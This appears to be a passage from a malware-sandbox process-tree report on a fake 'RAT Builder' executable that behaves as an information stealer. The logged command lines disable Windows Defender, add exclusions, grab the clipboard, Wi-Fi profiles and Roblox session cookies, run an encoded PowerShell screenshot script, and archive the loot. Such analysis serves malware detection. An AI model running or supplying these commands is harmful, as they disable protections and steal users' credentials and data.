- Suspicious use of FindShellTrayWindow
PID:1304

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Nitro Generator\" -spe -an -ai#7zMap29082:92:7zEvent16340
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1160

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\RAT Builder 2.0\" -spe -an -ai#7zMap11897:92:7zEvent1093
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2860

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\RAT Builder 2.0\READ ME!.txt
1⤵
PID:4964

C:\Users\Admin\Downloads\RAT Builder 2.0\Built.exe
"C:\Users\Admin\Downloads\RAT Builder 2.0\Built.exe"
1⤵
- Executes dropped EXE
PID:2600
- C:\Users\Admin\Downloads\RAT Builder 2.0\Built.exe
  "C:\Users\Admin\Downloads\RAT Builder 2.0\Built.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Loads dropped DLL
  PID:4112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\RAT Builder 2.0\Built.exe'"
    3⤵
    PID:5088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\RAT Builder 2.0\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:1800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    PID:4336
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:244
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3824
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3100
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:716
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3632
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5072
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1676
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3952
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1368
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:5760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:3232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5676
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\musq4p05\musq4p05.cmdline"
        5⤵
        
        PID:4684
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB6F2.tmp" "c:\Users\Admin\AppData\Local\Temp\musq4p05\CSCD462FF371DA24213A8A4724AEEDB8C58.TMP"
        6⤵
        
        PID:5296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5772
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:6052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:5988
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:6100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6128
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:208
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5128
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5312
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5240
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3748
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3128"
    3⤵
    PID:5484
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3128
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3128"
    3⤵
    PID:5552
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3128
      4⤵
      Kills process with taskkill
      PID:2892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4468"
    3⤵
    PID:5664
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5516
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4468
      4⤵
      Kills process with taskkill
      PID:5808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4468"
    3⤵
    PID:5864
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5564
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4468
      4⤵
      Kills process with taskkill
      PID:6000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2244"
    3⤵
    PID:5968
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2244
      4⤵
      Kills process with taskkill
      PID:5556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2244"
    3⤵
    PID:5440
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2244
      4⤵
      Kills process with taskkill
      PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2924"
    3⤵
    PID:5512
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2924
      4⤵
      Kills process with taskkill
      PID:6136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2924"
    3⤵
    PID:6128
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 2924
      4⤵
      Kills process with taskkill
      PID:5324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3420"
    3⤵
    PID:3668
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3420
      4⤵
      Kills process with taskkill
      PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3420"
    3⤵
    PID:5364
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3420
      4⤵
      Kills process with taskkill
      PID:1968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 836"
    3⤵
    PID:724
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 836
      4⤵
      Kills process with taskkill
      PID:5748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 836"
    3⤵
    PID:5388
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 836
      4⤵
      Kills process with taskkill
      PID:5680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4540"
    3⤵
    PID:6088
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4540
      4⤵
      Kills process with taskkill
      PID:3388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4540"
    3⤵
    PID:6112
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 4540
      4⤵
      Kills process with taskkill
      PID:4864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3876"
    3⤵
    PID:1856
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3876
      4⤵
      Kills process with taskkill
      PID:2996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3876"
    3⤵
    PID:4092
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /PID 3876
      4⤵
      Kills process with taskkill
      PID:3928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4376
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5920
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:5352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3588
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI26002\rar.exe a -r -hp"andomi10" "C:\Users\Admin\AppData\Local\Temp\08Uw3.zip" *"
    3⤵
    PID:928
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5664
  - - C:\Users\Admin\AppData\Local\Temp\_MEI26002\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI26002\rar.exe a -r -hp"andomi10" "C:\Users\Admin\AppData\Local\Temp\08Uw3.zip" *
      4⤵
      Executes dropped EXE
      PID:4680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:5992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:5596
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3672
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
